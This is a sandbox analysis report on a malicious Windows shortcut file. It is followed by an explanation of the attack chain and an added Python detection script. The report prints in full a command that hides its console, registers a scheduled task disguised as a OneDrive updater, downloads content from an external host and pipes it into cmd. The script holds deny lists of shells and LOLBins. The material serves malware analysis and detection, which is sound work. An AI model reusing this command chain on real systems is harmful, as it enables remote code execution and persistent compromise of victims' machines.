Analysis

max time kernel: 121s
max time network: 123s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 19-09-2024 01:06

Static task: static1
Behavioral task: behavioral1
  Sample: 18754374691d591315370ed114493b9995954f01bf43452df0af30d69a1670c6.lnk
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 18754374691d591315370ed114493b9995954f01bf43452df0af30d69a1670c6.lnk
  Resource: win10v2004-20240802-en

General

Target: 18754374691d591315370ed114493b9995954f01bf43452df0af30d69a1670c6.lnk
Size: 245KB
MD5: 0290bfd06ee52af334e6cd17bb03542a
SHA1: fb43ac19f177acb3cc7cd74155671733185339b6
SHA256: 18754374691d591315370ed114493b9995954f01bf43452df0af30d69a1670c6
SHA512: e0647f45fbf606fbf0d7dd5737c2c4d6794e7ed6322f05b1803b3f9011fcc33c29519e44715b13da96bc49fed564d79c2f5fe54b56d4f4779ebeb6fdccf6ccd1
SSDEEP: 6144:XBRWbjpVO9Ko6pGKlt9Z6v+iEpgnXtP2gUly2ukiT:XiPho60Kt9ZylBnXteDlXs
Malware Config

Signatures

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 1 IoC)
  Adversaries may check for Internet connectivity on compromised systems.
  pid 2776  process conhost.exe

Suspicious use of WriteProcessMemory (3 IoCs)
  description                        pid   process  procid_target
  PID 2232 wrote to memory of 2776   2232  cmd.exe  31
  PID 2232 wrote to memory of 2776   2232  cmd.exe  31
  PID 2232 wrote to memory of 2776   2232  cmd.exe  31
Processes

1. C:\Windows\system32\cmd.exe
   cmd /c C:\Users\Admin\AppData\Local\Temp\18754374691d591315370ed114493b9995954f01bf43452df0af30d69a1670c6.lnk
   PID: 2232
   Signature: Suspicious use of WriteProcessMemory

   2. C:\WINDOWS\system32\conhost.exe (child of PID 2232)
      "C:\WINDOWS\system32\conhost.exe" --headless ssh -o ProxyCommand="cmd /c ping www.google.com > nul & timeout /t 3 & schtasks /create /tn OneDriveStandaloneUpdateEngine1.0.3 /f /sc minute /mo 17 /tr \"conhost --headless cmd /c curl --ssl-no-revoke -o C:\Users\Public\documents\tmp.jpg https://www.surininfiniumclub.com/debug.php?us=XPAJOTIY_Admin & more C:\Users\Public\documents\tmp.jpg | cmd\" " .
      PID: 2776
      Signature: System Network Configuration Discovery: Internet Connection Discovery

What the conhost.exe command line does: conhost.exe --headless launches ssh without a visible console window. ssh never needs to reach the host argument "." because it runs the ProxyCommand string first, before any connection attempt, so the real payload is the cmd /c chain inside that option. The chain pings www.google.com as a connectivity check (the Internet Connection Discovery signature above), waits three seconds, then registers a scheduled task named OneDriveStandaloneUpdateEngine1.0.3 that fires every 17 minutes. Each run again uses conhost --headless to fetch https://www.surininfiniumclub.com/debug.php?us=XPAJOTIY_Admin with curl --ssl-no-revoke (certificate revocation checking disabled) into C:\Users\Public\documents\tmp.jpg and pipes that file into cmd, so whatever the server returns is executed as batch commands. The query string carries the sandbox user name (Admin), which looks like victim tagging. No curl or second conhost appears in the process list, so the task's action did not run during this 121-second analysis and no second stage was captured, which is consistent with the empty Malware Config section.
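As an added example (not part of the sandbox report), the Python below turns the chain above into detection logic that can be run over process-creation command lines such as Sysmon Event ID 1 or Windows 4688 would record. It flags the three abuses that make the chain work (conhost --headless, an ssh ProxyCommand that starts a shell or LOLBin instead of a proxy helper, and a schtasks /create action that downloads content and pipes it into cmd) and extracts the indicators a responder needs. The PID 2776 command line is taken from the report; the event record shape (pid, image, cmdline), the benign jump-host ssh and stock conhost events, and the PROXY_HELPERS/SHELLS allow and deny lists are constructed assumptions for the example.

```python
"""Detect the conhost --headless / ssh ProxyCommand / schtasks chain.

Added example, not sandbox output. Event records are assumed to carry
pid, image and cmdline, as a Sysmon EID 1 or 4688 forwarder would.
"""
import re

# Assumed allow list: programs that legitimately act as a ProxyCommand.
PROXY_HELPERS = {"ssh", "ssh.exe", "nc", "ncat", "connect", "corkscrew", "socat"}
# Assumed deny list: interpreters/LOLBins that have no business as a ProxyCommand.
SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh", "pwsh.exe",
          "curl", "curl.exe", "certutil", "certutil.exe", "mshta", "wscript",
          "cscript", "rundll32", "rundll32.exe"}

# ProxyCommand="..." (allowing \" escapes inside) or a single unquoted token.
PROXY_RE = re.compile(r'ProxyCommand=(?:"((?:[^"\\]|\\.)*)"|(\S+))', re.IGNORECASE)


def proxy_command(cmdline):
    """Return the ProxyCommand value from an ssh command line, or None."""
    m = PROXY_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def _program(cmd):
    """Basename of the first token of a Windows command string."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmd)
    if not m:
        return ""
    token = m.group(1) or m.group(2)
    return token.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def findings(cmdline):
    """Reasons this command line is suspicious; empty list if none."""
    out = []
    if re.search(r'conhost(?:\.exe)?"?\s+--headless', cmdline, re.I):
        out.append("conhost --headless hides the console of its child process")
    pc = proxy_command(cmdline)
    if pc is not None:
        prog = _program(pc)
        if prog in SHELLS:
            out.append(f"ssh ProxyCommand runs a shell/LOLBin ({prog}) instead of a proxy helper")
        elif prog not in PROXY_HELPERS:
            out.append(f"ssh ProxyCommand runs an unexpected program ({prog})")
    if re.search(r'schtasks(?:\.exe)?\s+/create', cmdline, re.I):
        if re.search(r'\bcurl\b', cmdline, re.I) and re.search(r'\|\s*cmd\b', cmdline, re.I):
            out.append("schtasks /create action downloads content and pipes it into cmd")
        elif pc is not None and "schtasks" in pc.lower():
            out.append("schtasks /create issued from inside an ssh ProxyCommand")
    return out


def iocs(cmdline):
    """Indicators worth extracting from a flagged command line."""
    d = {}
    urls = re.findall(r'https?://[^\s"\\]+', cmdline)
    if urls:
        d["urls"] = urls
    m = re.search(r'/tn\s+(\S+)', cmdline, re.I)
    if m:
        d["task_name"] = m.group(1)
    m = re.search(r'/sc\s+(\w+)\s+/mo\s+(\d+)', cmdline, re.I)
    if m:
        d["schedule"] = f"every {m.group(2)} {m.group(1)}(s)"
    m = re.search(r'\bcurl\b.*?\s-o\s+(\S+)', cmdline, re.I)   # curl output file
    if m:
        d["drop_path"] = m.group(1)
    m = re.search(r'\bping\s+(\S+)', cmdline, re.I)
    if m:
        d["connectivity_check"] = m.group(1)
    return d


def analyze(cmdline):
    return {"findings": findings(cmdline), "iocs": iocs(cmdline)}


def scan(events):
    """Return only the events that produce findings, with their IOCs attached."""
    return [{"pid": ev["pid"], "image": ev["image"], **analyze(ev["cmdline"])}
            for ev in events if findings(ev["cmdline"])]


# Command line of PID 2776 exactly as recorded in the report.
REPORT_CMDLINE = (
    r'"C:\WINDOWS\system32\conhost.exe" --headless ssh -o ProxyCommand="cmd /c '
    r'ping www.google.com > nul & timeout /t 3 & schtasks /create '
    r'/tn OneDriveStandaloneUpdateEngine1.0.3 /f /sc minute /mo 17 '
    r'/tr \"conhost --headless cmd /c curl --ssl-no-revoke '
    r'-o C:\Users\Public\documents\tmp.jpg '
    r'https://www.surininfiniumclub.com/debug.php?us=XPAJOTIY_Admin '
    r'& more C:\Users\Public\documents\tmp.jpg | cmd\" " .'
)
# Constructed benign events: a jump-host ssh and the stock conhost command line.
BENIGN_SSH = (r'"C:\Windows\System32\OpenSSH\ssh.exe" '
              r'-o ProxyCommand="ssh -W %h:%p bastion.corp.example" app01.corp.example')
SAMPLE_EVENTS = [
    {"pid": 2232, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd /c C:\Users\Admin\AppData\Local\Temp\18754374691d591315370ed114493b9995954f01bf43452df0af30d69a1670c6.lnk"},
    {"pid": 2776, "image": r"C:\WINDOWS\system32\conhost.exe", "cmdline": REPORT_CMDLINE},
    {"pid": 4100, "image": r"C:\Windows\System32\OpenSSH\ssh.exe", "cmdline": BENIGN_SSH},
    {"pid": 4120, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"\??\C:\WINDOWS\system32\conhost.exe 0x4"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["pid"], hit["image"])
        for f in hit["findings"]:
            print("  !", f)
        for k, v in hit["iocs"].items():
            print("  ", k, "=", v)
```

Run stand-alone it reports only PID 2776, with the task name, 17-minute interval, drop path, connectivity-check host and URL pulled out; the jump-host ssh and the stock conhost line pass. On a suspected host the same indicators translate directly into checks: schtasks /query /tn OneDriveStandaloneUpdateEngine1.0.3, the presence of C:\Users\Public\documents\tmp.jpg, and proxy or DNS logs for www.surininfiniumclub.com. conhost --headless and curl --ssl-no-revoke each occur in legitimate software, so alert on the combination with a shell-bearing ProxyCommand rather than on either flag alone.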